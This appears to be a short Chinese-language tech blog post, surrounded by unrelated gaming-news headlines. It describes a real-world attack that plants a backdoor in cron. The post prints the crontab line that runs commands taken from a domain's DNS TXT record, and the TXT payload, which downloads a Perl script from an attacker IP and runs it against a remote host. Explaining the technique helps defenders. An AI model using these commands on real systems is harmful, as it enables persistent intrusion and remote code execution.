《Disney +》 迪士尼、Marvel、彼思、星球大戰…  《Deathloop》最新「似曾相識」預告片:新潮演繹,一窺寇特在黑礁島上的冒險旅程   準備迎接PlayStation「2021 Days of Play」社群慶祝活動   Switch版「Apex英雄」容量為30GB…容量不夠該怎麼辦?由Saiga NAK編輯部精選出三大值得推薦的microSD卡!   2D對戰格鬥遊戲《MELTY BLOOD: TYPE LUMINA》開始開放預約數位版   日本任天堂推出「Nintendo Switch黃金週特惠」!快來撿便宜吧!   開放世界RPG手機遊戲新作「Over Eclipse」開放事前登錄,並同時舉辦抽獎活動!   PlayStation® Partner Awards 2021日本及亞洲地區得獎者名單將自12月2日起接連兩天公布!   CAPCOM官方節目將在東京電玩展首日登場!CAPCOM TGS2021 Online網站開幕! 

使用 Cron 埋入後門 來執行 DNS 查詢的攻擊模式

商業

現在入侵機器後,攻擊模式越來越多元了,連要做什麼事情的程式(一般至少會寫要去哪抓程式),都不直接寫在裡面了...

使用 Cron 埋入後門 來執行 DNS 查詢的攻擊模式

平常安全性的檢查,比較不會去檢查 Cron,所以這次的攻擊手法就是把後門埋在 Cronjob 裡面,而且看起來就只是做 DNS 的查詢動作而已。

下述內容整理自此篇:Cronjob Backdoors

此攻擊手法是利用 Cronjob 埋入後門,定期依照 DNS TXT 的紀錄來遠端執行惡意程式。

手法步驟如下:

  1. crontab 埋入下述:
    0 1 * * * /bin/sh -c "sh -c $(dig logging.chat TXT +short @pola.ns.cloudflare.com)"
  2. 於 logging.chat 這個 Domain 的 DNS TXT 內容如下:
    "wget hxxp://89(.)248(.)171(.)3/h.pl -q -O /dev/shm/h.pl&&nohup perl /dev/shm/h.pl 66.172.27.225 80&disown"

於是就會每天在 1:00 的時候,自動抓取惡意程式來執行。

Tsung

隨機商業新聞

NordVPN